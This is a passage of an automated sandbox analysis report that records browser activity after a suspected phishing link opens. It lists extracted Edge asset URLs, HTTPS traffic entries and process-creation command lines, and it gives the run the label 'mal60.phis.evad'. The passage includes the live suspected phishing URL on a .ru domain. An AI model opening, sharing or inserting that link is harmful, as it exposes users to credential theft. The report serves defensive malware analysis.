    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.dr, HubApps Icons.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
    Source: HubApps Icons.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
    Source: HubApps Icons.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
    Source: HubApps Icons.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://gaana.com/
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://m.kugou.com/
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://m.soundcloud.com/
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://m.vk.com/
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://music.amazon.com
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://music.apple.com
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://music.yandex.com
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://open.spotify.com
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://outlook.live.com/mail/0/
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://outlook.office.com/mail/0/
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
    Source: Favicons.11.drString found in binary or memory: https://studiostaticassetsprod.azureedge.net/bundle-cmc/favicon.ico
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://tidal.com/
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://twitter.com/
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://vibe.naver.com/today
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://web.telegram.org/
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://web.whatsapp.com
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://www.deezer.com/
    Source: content_new.js.11.dr, content.js.11.drString found in binary or memory: https://www.google.com/chrome
    Source: Web Data.11.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://www.iheart.com/podcast/
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://www.instagram.com
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://www.last.fm/
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://www.messenger.com
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://www.office.com
    Source: Top Sites.11.drString found in binary or memory: https://www.office.com/
    Source: Top Sites.11.drString found in binary or memory: https://www.office.com/Office
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://www.tiktok.com/
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://www.youtube.com
    Source: fe5cb3d4-4852-4c21-ad38-a955f66f81b2.tmp.11.drString found in binary or memory: https://y.music.163.com/m/
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: classification engineClassification label: mal60.phis.evad.win@64/298@20/11
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677FDD68-4AC.pmaJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Users\user\AppData\Local\Temp\66c95b8f-8d4b-49ac-9b26-631c5aaa3125.tmpJump to behavior
    Source: Login Data.11.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2032,i,5592853975208518090,15640883060359809183,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bryf.atchirlisc.ru/EeMAGvIe/"
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:?url=http%3A%2F%2Fwww.bing.com%2Fchat%3Fform%3DWSBSH1%26cvid%3Db374da154d8a4e3bb912f43f50eaafd2%26nclid%3D4C9C2B2D0465FD7A42C74C7E93CFB630%26ts%3D1736433000464%26nclidts%3D1736433000%26tsms%3D464&timestamp=1736433000464&source=WindowsSearchBox&medium=CodexUpsell
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2604 --field-trial-handle=2536,i,1983186790017537026,10976805212909534197,262144 /prefetch:3
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6276 --field-trial-handle=2536,i,1983186790017537026,10976805212909534197,262144 /prefetch:8
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6592 --field-trial-handle=2536,i,1983186790017537026,10976805212909534197,262144 /prefetch:8
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=5572 --field-trial-handle=2536,i,1983186790017537026,10976805212909534197,262144 /prefetch:8
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=5572 --field-trial-handle=2536,i,1983186790017537026,10976805212909534197,262144 /prefetch:8
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2092,i,12039556330216411981,17761890535772019975,262144 /prefetch:3
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1680 --field-trial-handle=2068,i,391148098692564676,17790295371905818145,262144 /prefetch:3
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2032,i,5592853975208518090,15640883060359809183,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2604 --field-trial-handle=2536,i,1983186790017537026,10976805212909534197,262144 /prefetch:3Jump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
